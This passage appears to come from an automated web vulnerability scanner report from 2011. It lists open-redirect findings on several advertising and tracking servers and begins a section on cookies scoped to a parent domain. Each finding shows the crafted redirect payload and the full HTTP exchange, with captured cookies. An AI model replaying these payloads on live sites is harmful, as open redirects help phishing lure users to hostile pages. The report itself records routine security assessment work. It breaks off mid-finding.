<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Insurance total loss rvs, motorcycles, atvs, snowmobiles, boats, trucks, trailers.
...[SNIP]...
<hr width="645" size="1">
   
<FORM name="BidOnItem26361" onsubmit="return ValidateFields(this)" action="default.asp" ID="Form1">
<input type="hidden" name="pg" value="ProcBid" ID="Hidden1">
...[SNIP]...
<td><input type="password" name="PASSWORD" size="25"></td>
...[SNIP]...

15. Open redirection
There are 11 instances of this issue:


15.1. http://0.gravatar.com/avatar/8ce02a29142905cdfb140added296ef8 [d parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /avatar/8ce02a29142905cdfb140added296ef8

Issue detail

The value of the d request parameter is used to perform an HTTP redirect. The payload http%3a//a15c964c82e0a6c77/a%3fmonsterid was submitted in the d parameter. This caused a redirection to the following URL:

Request

GET /avatar/8ce02a29142905cdfb140added296ef8?s=32&d=http%3a//a15c964c82e0a6c77/a%3fmonsterid&r=G HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: 0.gravatar.com

Response

HTTP/1.1 302 Found
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 02:48:57 GMT
Expires: Mon, 02 May 2011 02:53:57 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://a15c964c82e0a6c77/a?monsterid
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 81441642
Content-Length: 0


15.2. http://0.gravatar.com/avatar/a76bb4a499349279e0339b78885213c6 [d parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /avatar/a76bb4a499349279e0339b78885213c6

Issue detail

The value of the d request parameter is used to perform an HTTP redirect. The payload http%3a//a8cdb9f7243bbb9d5/a%3fmonsterid was submitted in the d parameter. This caused a redirection to the following URL:

Request

GET /avatar/a76bb4a499349279e0339b78885213c6?s=32&d=http%3a//a8cdb9f7243bbb9d5/a%3fmonsterid&r=G HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: 0.gravatar.com

Response

HTTP/1.1 302 Found
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 02:48:48 GMT
Expires: Mon, 02 May 2011 02:53:48 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://a8cdb9f7243bbb9d5/a?monsterid
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 887218094
Content-Length: 0


15.3. http://1.gravatar.com/avatar/31345061262d8fde4fa5256164900115 [d parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /avatar/31345061262d8fde4fa5256164900115

Issue detail

The value of the d request parameter is used to perform an HTTP redirect. The payload http%3a//a704709dd590a351d/a%3fmonsterid was submitted in the d parameter. This caused a redirection to the following URL:

Request

GET /avatar/31345061262d8fde4fa5256164900115?s=32&d=http%3a//a704709dd590a351d/a%3fmonsterid&r=G HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: 1.gravatar.com

Response

HTTP/1.1 302 Found
Cache-Control: max-age=300
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 02:49:52 GMT
Expires: Mon, 02 May 2011 02:54:52 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://a704709dd590a351d/a?monsterid
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 2748318891
Content-Length: 0


15.4. http://admonkey.dapper.net/AdBriteUIDMonster [redirect parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://admonkey.dapper.net
Path:   /AdBriteUIDMonster

Issue detail

The value of the redirect request parameter is used to perform an HTTP redirect. The payload http%3a//a23f19667fa4af97b/a%3fhttp%3a//ads.adbrite.com/adserver/vdi/779045%3fd%3d[VISITORDATA] was submitted in the redirect parameter. This caused a redirection to the following URL:

Request

GET /AdBriteUIDMonster?redirect=http%3a//a23f19667fa4af97b/a%3fhttp%3a//ads.adbrite.com/adserver/vdi/779045%3fd%3d[VISITORDATA] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: admonkey.dapper.net

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.64
Date: Mon, 02 May 2011 02:36:02 GMT
Connection: keep-alive
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Set-Cookie: uid=17610455041928294; Expires=Sat, 29-Oct-2011 02:36:02 GMT
Location: http://a23f19667fa4af97b/a?http://ads.adbrite.com/adserver/vdi/779045?d=17610455041928294
Content-Length: 0


15.5. http://ads.adbrite.com/adserver/vdi/682865 [r parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//a46395568984586da/a%3fhttp%3a//user.lucidmedia.com/clicksense/user%3fp%3d88436487f575811a%26r%3d0%26i%3d was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /adserver/vdi/682865?d=null&r=http%3a//a46395568984586da/a%3fhttp%3a//user.lucidmedia.com/clicksense/user%3fp%3d88436487f575811a%26r%3d0%26i%3d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=EAE; fq="876fb%2C1uo0%7Clkjpza"

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:38:17 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://a46395568984586da/a?http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRjst827DiIEbnVsbBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:38:17 GMT
Set-Cookie: rb=0:682865:20838240:null:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:38:17 GMT
Content-Length: 0


15.6. http://ads.adbrite.com/adserver/vdi/711384 [r parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//af57d92a7e02034ec/a%3fhttp%3a//a.triggit.com/pxabcm%3fabid%3d was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=4tv6lf&r=http%3a//af57d92a7e02034ec/a%3fhttp%3a//a.triggit.com/pxabcm%3fabid%3d HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBj0x-yREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A6e73"; fq="84fok%2C1uo0%7Clkigxp"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AHc3LDoMgEIXhd5k1CwZaanwbUCqmFMulEnR895Juv%2F8k54RdwHjCy7a6pTnDCJNzwxK53gmjX8qbBBkWozxqh0Em3wHvLIuckPDTniGQJsRysOyt931lSt3oQcpINjmv1qZuofPMv70SBwZGh2DT%2Bj%2BE6%2FoB"; vsd=0@2@4dbe0f3a@loadus.exelator.com

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:07:18 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://af57d92a7e02034ec/a?http://a.triggit.com/pxabcm?abid=MTY4MzYyMDQ5eDAuMDQ5IDEzMDMwODM0NTB4NTQ0NjY5MDY4
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBjagPPNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:07:18 GMT
Set-Cookie: ut="1%3AHY1LDoMgFADv8tYseNBS421AqZhSLJ9K0OfdS7qdmWRO2AWMJ7xsq1uaM4wwOTcskeudMPqlvEmQYVnkhISf9gyBNCGWg8Uoj9qjQSbfI7yz7K33nZhSN3qQMpJNzqu1qVvoeObfbokDA6NDsGn9D%2BG6fg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:07:18 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 02:07:18 GMT
Content-Length: 0


15.7. http://ads.adbrite.com/adserver/vdi/806205 [r parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/806205

Issue detail

The value of the r request parameter is used to perform an HTTP redirect. The payload http%3a//afc2d7176e1c04036/a%3fhttp%3a//d.chango.com/m/s/AdBrite%3fpartner_uid%3d was submitted in the r parameter. This caused a redirection to the following URL:

Request

GET /adserver/vdi/806205?d=3728e74c-7461-11e0-9185-00259009a9e4&r=http%3a//afc2d7176e1c04036/a%3fhttp%3a//d.chango.com/m/s/AdBrite%3fpartner_uid%3d HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.adbrite.com
Cookie: Apache=168362101x0.883+1297102923x-1438991006; srh="1%3Aq64FAA%3D%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3A12ggb"; rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNBAB; fq="876fb%2C1uo0%7Clkjpza%7Clkjpze%7Clkjpzs"; rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUipONEpJrDEszMlIS60xrDGoMSzNN1DSUUpKzMtLLcoEq1GqrQUA"

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Mon, 02 May 2011 02:40:58 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://afc2d7176e1c04036/a?http://d.chango.com/m/s/AdBrite?partner_uid=MTY4MzYyMTAxeDAuODgzIDEyOTcxMDI5MjN4LTE0Mzg5OTEwMDY
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjAKBjc2MjcwMRiS-_rNEyIgNDk1MjZCMUIzRkREMDNGQkMxNEREQzUwMDg5QkM4NTAKIQoGNzc5MDQ1GKeL-s0TIhExNzYwODg0MzkxMzEzMjUzNAo0CgY4MDYyMDUY--vruBgiJDM3MjhlNzRjLTc0NjEtMTFlMC05MTg1LTAwMjU5MDA5YTllNBAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:40:58 GMT
Set-Cookie: rb=0:762701:20861280:49526B1B3FDD03FBC14DDC50089BC850:0:779045:20861280:17608843913132534:0:806205:20882880:3728e74c-7461-11e0-9185-00259009a9e4:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:40:58 GMT
Content-Length: 0


15.8. http://bh.contextweb.com/bh/rtset [rurl parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The value of the rurl request parameter is used to perform an HTTP redirect. The payload http%3a//a5dc11db6f719defa/a%3fhttp%3a//a.triggit.com/pxcwcm was submitted in the rurl parameter. This caused a redirection to the following URL:

Request

GET /bh/rtset?do=add&pid=530741&ev=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=3w3v1p&rurl=http%3a//a5dc11db6f719defa/a%3fhttp%3a//a.triggit.com/pxcwcm HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web84
Cache-Control: no-cache, no-store
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Thu, 26-Apr-2012 02:05:06 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|530741.c1e1301e-3a1f-4ca7-9870-f636b5f10e66.0|535461.2931142961646634775.1; Domain=.contextweb.com; Expires=Tue, 01-May-2012 02:05:06 GMT; Path=/
Location: http://a5dc11db6f719defa/a?http://a.triggit.com/pxcwcm
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Mon, 02 May 2011 02:05:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


15.9. http://pixel.rubiconproject.com/tap.php [next parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The value of the next request parameter is used to perform an HTTP redirect. The payload http%3a//ade6906d72fcaf38a/a%3fhttp%3a//a.triggit.com/pxruourcm was submitted in the next parameter. This caused a redirection to the following URL:

Request

GET /tap.php?v=4554&nid=1430&put=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&expires=180&cb=xy7kwd&next=http%3a//ade6906d72fcaf38a/a%3fhttp%3a//a.triggit.com/pxruourcm HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; put_1986=2724386019227846218; cd=false; put_2100=usr3fd49cb9a7122f52; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C208%2C2%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 02:09:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%266286%3D1%264210%3D1%265852%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1%266073%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1; expires=Wed, 01-Jun-2011 02:09:18 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C0%2C1%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C148%2C2%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C114%2C2%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C243%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%263811%3D11433%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C; expires=Wed, 01-Jun-2011 02:09:18 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; expires=Sat, 29-Oct-2011 02:09:18 GMT; path=/; domain=.rubiconproject.com
Location: http://ade6906d72fcaf38a/a?http://a.triggit.com/pxruourcm
Content-Length: 0
Content-Type: text/html; charset=UTF-8


15.10. http://s.ixiaa.com/digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif [&redirect parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://s.ixiaa.com
Path:   /digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif

Issue detail

The value of the &redirect request parameter is used to perform an HTTP redirect. The payload http%3a//a88b390374f6600e3/a%3fhttp%3a//tags.bluekai.com/site/3754%3fphint%3dea%25253D%257BEA_value%257D%26phint%3deb%25253D%257BEB_value%257D%26phint%3dec%25253D%257BEC_value%257D%26phint%3ded%25253D%257BED_value%257D%26phint%3dee%25253D%257BEE_value%257D%26ret%3dhtml%26id%3dPARTNER_UUID was submitted in the &redirect parameter. This caused a redirection to the following URL:

Request

GET /digi/9D763773-52FA-4D45-8966-C91EFF22B643/a.gif?&redirect=http%3a//a88b390374f6600e3/a%3fhttp%3a//tags.bluekai.com/site/3754%3fphint%3dea%25253D%257BEA_value%257D%26phint%3deb%25253D%257BEB_value%257D%26phint%3dec%25253D%257BEC_value%257D%26phint%3ded%25253D%257BED_value%257D%26phint%3dee%25253D%257BEE_value%257D%26ret%3dhtml%26id%3dPARTNER_UUID HTTP/1.1
Host: s.ixiaa.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/3945?ret=html&phint=__bk_t%3DLogin%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=25552944
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: nginx
Date: Mon, 02 May 2011 02:00:14 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Location: http://a88b390374f6600e3/a?http://tags.bluekai.com/site/3754?phint=ea%3DNA&phint=eb%3DNA&phint=ec%3DNA&phint=ed%3DNA&phint=ee%3DNA&ret=html&id=PARTNER_UUID
X-ClientIP: 173.193.214.243
Content-Length: 3

...

15.11. http://sync.mathtag.com/sync/img [redir parameter]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The value of the redir request parameter is used to perform an HTTP redirect. The payload http%3a//a582a8171468fa991/a%3fhttp%3a//ads.adbrite.com/adserver/vdi/684339%3fd%3d[VISITORDATA] was submitted in the redir parameter. This caused a redirection to the following URL:

Request

GET /sync/img?mt_exid=1&type=sync&redir=http%3a//a582a8171468fa991/a%3fhttp%3a//ads.adbrite.com/adserver/vdi/684339%3fd%3d[VISITORDATA] HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: sync.mathtag.com
Cookie: uuid=4d50384b-4b5e-0f67-919a-7275589c0b85; ts=1299605541

Response

HTTP/1.1 302 Found
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n2a pid 0x6b3e 27454
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 02 May 2011 02:38:08 GMT
Location: http://a582a8171468fa991/a?http://ads.adbrite.com/adserver/vdi/684339?d=uuid%3D4d50384b-4b5e-0f67-919a-7275589c0b85
Etag: 4d50384b-4b5e-0f67-919a-7275589c0b85
Connection: Keep-Alive
Set-Cookie: ts=1304303888; domain=.mathtag.com; path=/; expires=Tue, 01-May-2012 02:38:08 GMT
Content-Length: 0


16. Cookie scoped to parent domain
There are 63 instances of this issue:


16.1. http://t.mookie1.com/t/v1/event

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/event

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/event?migClientId=1392&migAction=cntwir_servicefamilyoverview_1&migSource=mig HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFM=011QD4ETU10CWN; NXCLICK2=011QD4ETNX_TRACK_Radioshack/Magnetic/DYN2011Q1/M_COM/1x1/1[timestamp]!y!B3!CWN!EUV; RMFL=011QD4ETU107OI|U107OK; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:09 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Fri, 25-May-12 23:35:09 GMT; domain=.mookie1.com
Set-Cookie: session=1304292909|1304292909; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

16.2. http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.business.att.com
